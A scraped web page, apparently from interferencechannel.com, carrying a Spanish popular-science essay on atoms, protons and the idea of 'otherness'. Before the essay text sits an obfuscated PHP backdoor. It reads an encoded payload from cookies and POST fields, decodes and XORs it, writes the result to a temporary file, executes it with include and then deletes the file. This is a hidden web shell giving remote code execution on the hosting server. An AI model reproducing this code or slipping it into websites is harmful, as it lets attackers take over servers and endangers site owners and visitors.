$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> La Otredad Escalada – www.interferencechannel.com

La Otredad Escalada

abril-15_atom

Ilustración de Barbara NIño

Todas la cosas a nuestro alrededor aparentan ser diferentes en nuestra escala (que se mueve más o menos entre centímetros y kilómetros) casi como si estuvieran hechas de cualquier cosa y “atrapados” en esta escala pareciera que todo es, incluso, demasiado diferente.

Afortunadamente, más de 2500 años de esfuerzo han demostrado que todo está hecho de átomos. Átomos de diferentes elementos.

Esos elementos (112 conocidos hasta ahora) los llamamos caprichosamente hidrógeno, carbón, litio, oro, plata, oxígeno etc. y lo fundamental es que su definición básica es el siguiente criterio:

Primer elemento: Un protón*.

Segundo elemento: Dos protones.

Tercer elemento: Tres protones.

Y así sucesivamente.

El número de protones es suficiente como criterio porque todos los elementos son neutrales, lo que automáticamente implica que el número de protones es siempre igual al número de electrones**.

La otredad es un concepto que se desmorona rápidamente si pensamos en términos de esta escala, puesto que, si no conociéramos el resto, la única diferencia entre lo que es algo y lo que es algo diferente es su número de protones/electrones. Este hecho confronta la idea de la otredad, si contemplamos la idea de la otredad en términos de la escala atómica.

Esta diferencia entre todos los elementos es la causa de que todo parezca diferente y lo sea. Automáticamente también es la causa de que todo este hecho de lo mismo, porque todos los átomos de un elemento en particular tienen el mismo número de protones.

Y esto, queridos lectores, es algo que es válido sea donde sea que existan dichos elementos, en ustedes o en los planetas que aún no conocemos: a escala universal.

Como todos nosotros estamos hechos de una mezcla de átomos (entre los cuales el oxígeno, el carbono y el hidrógeno son los más importantes) nuestros átomos son exactamente lo mismo en términos de su número de protones.

Afortunadamente y en beneficio de la salud mental de todos nosotros algunas preguntas se pueden responder limitando la escala a la cual queremos responderlas.

En la escala atómica podríamos hablar de otredad en nuestros sueños (o quizá en algún momento del futuro) cuando encontramos o encontremos otras mentes que puedan entender el concepto de “otredad” también y no estén hechas mayoritariamente de oxígeno, carbono e hidrógeno.

Mientras tanto seguiremos tratando de comprender de donde surge toda esta complejidad a nuestro alrededor, bien sea desde la escala de las cosas aún más grandes que nosotros o desde la escala de las cosas más pequeñas que nosotros.

Para quienes quieran saber más sobre las escalas en el universo les recomiendo ‘The scale of the universe’ : http://htwins.net/scale/

* partícula con carga positiva, apróximadamente 2000 veces más masiva que un electrón

**partícula con carga negativa.♦

*Cristina Castro es editora de ciencia de Interference Channel, vive en Tubingen, Alemania.

Comments are closed.